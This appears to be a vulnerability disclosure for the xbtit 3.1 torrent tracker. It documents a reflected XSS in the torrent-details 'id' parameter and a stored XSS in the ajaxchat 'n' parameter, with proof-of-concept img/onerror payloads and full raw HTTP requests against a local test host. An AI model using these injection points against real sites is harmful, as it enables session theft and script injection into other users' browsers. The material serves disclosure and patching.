Reflected XSS
The /index.php?page=torrent-details is actually /details.php called through page parameter from index.php. The id parameter (GET ) is vulnerable to Reflected XSS.
The PoC contains the following xss payload
<img src=a onerror=alert(6*8)>
GET /xbtit/xbtit-3.1-master/index.php?page=torrent-details&id=f1fcdc1462d36530f526c1d9402eec9100b7ba18rsswr%3Cimg%20src%3da%20onerror%3dalert(6*8)%3Epbubj&rating=5&vote=Vote! HTTP/1.1 Host: xbtit.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345 Upgrade-Insecure-Requests: 1
Stored XSS
The /ajaxchat/sendChatData.php page is vulnerable to Stored XSS thought the n parameter (POST).
This is the original legitimate POST request to send a message to the chat box.
POST /xbtit/xbtit-3.1-master/ajaxchat/sendChatData.php HTTP/1.1 Host: xbtit.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 18 Origin: http://xbtit.local Connection: close Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345 n=user&c=hello&u=6
This is the modified POST request to send a message to the chat box that contains the following PoC XSS payload appended to the n parameter (POST) in URL encoded format that contains the username of the user that will post the message.
<img src=a onerror=alert("XSS")>
POST /xbtit/xbtit-3.1-master/ajaxchat/sendChatData.php HTTP/1.1 Host: xbtit.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 18 Origin: http://xbtit.local Connection: close Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345 n=user%3c%69%6d%67%20%73%72%63%3d%61%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%22%58%53%53%22%29%3e&c=hello&u=6
[Vulnerability Type]
XSS stored & reflected
——————————————
[Vendor of Product]
Btiteam
https://github.com/btiteam/xbtit-3.1
——————————————
[Attack Type]
Remote – Authenticated
——————————————
[Reference]
https://github.com/btiteam/xbtit-3.1/